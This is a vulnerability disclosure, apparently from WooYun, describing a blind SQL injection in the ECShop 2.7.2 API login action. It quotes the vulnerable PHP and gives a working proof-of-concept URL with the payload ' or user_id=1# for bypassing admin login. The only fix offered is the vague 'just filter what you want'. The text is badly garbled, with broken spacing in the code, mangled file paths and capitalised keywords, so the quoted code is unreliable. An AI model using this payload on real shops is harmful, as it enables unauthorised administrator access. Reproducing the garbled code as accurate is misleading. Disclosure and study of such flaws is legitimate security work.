ECShop 2.7.2 API blind injection vulnerability and repair solution

 

Brief description:

This vulnerability has been tested by myself. When the server disables the magic quotation marks, You can blind note, not affected by the ECShop kernel filter. This time it's not difficult

The problem file is stored in/api/client/api. php.

Use POST

Detailed description:

/Api/client/api. php Line 4

Dispatch ($ _ POST );

 

/Api/client/uplodes/lib_api.php 6-10 lines

$ Func_arr = array ('getdomain', 'userlogin', 'addcategory ', 'addbrand', 'addgoods', 'getcategory ', 'getbrand', 'getgoods ', 'deletebrand', 'deleteategory ', 'deleteuploads', 'editbrand', 'editcategory', 'editgoods ');

 

If (in_array ($ post ['action'], $ func_arr) & function_exists ('api _ '. $ post ['action'])

 

{

 

Return call_user_func ('api _ '. $ post ['action'], $ post );

 

}

 

When $ _ POST ['action'] = 'userlogin', call

/Api/client/node des/lib_api.php row 246

Function API_UserLogin ($ post)

 

{

 

$ Post ['username'] = isset ($ post ['userid'])? Trim ($ post ['userid']): '';

 

$ Post ['Password'] = isset ($ post ['Password'])? Strtolower (trim ($ post ['Password']): '';

 

 

 

/* Check whether the password is correct */

 

$ SQL = "SELECT user_id, user_name, password, action_list, last_login ".

 

"FROM". $ GLOBALS ['ecs']-> table ('admin _ user ').

 

"WHERE user_name = '". $ post ['username']. "'";

 

$ Row = $ GLOBALS ['db']-> getRow ($ SQL );

 

If ($ row)

 

{

 

If ($ row ['Password']! = $ Post ['Password'])

 

{

 

Client_show_message (103 );

 

}

 

Require_once (ROOT_PATH. ADMIN_PATH. '/includes/lib_main.php ');

 

// Login successful

 

Set_admin_session ($ row ['user _ id'], $ row ['user _ name'], $ row ['Action _ list'], $ row ['last _ login']);

 

 

 

// Update the Last Logon Time and IP address

 

$ GLOBALS ['db']-> query ("UPDATE". $ GLOBALS ['ecs']-> table ('admin _ user ').

 

"SET last_login = '". gmtime (). "', last_ip = '". real_ip ()."'".

 

"WHERE user_id = '$ _ SESSION [admin_id]'");

 

Client_show_message (100, true, VERSION, 0, true, EC_CHARSET );

 

}

 

The USERID is not filtered and is not affected by kernel filtering, resulting in a blind injection vulnerability.

Proof of vulnerability:

Http://www.bkjia.com/ecshop/api/client/api. php? Action = UserLogin & UserId = % 27% 20or % 20user_id = 1% 23

Note: To facilitate the test, I changed the POST method in the code to GET. To facilitate the display of successful injection, I inserted the appropriate code after executing the SQL statement to display the result. The real environment does not show the results

Solution:

 

Just filter what you want.

 

 

Author: tenzy @ wooyun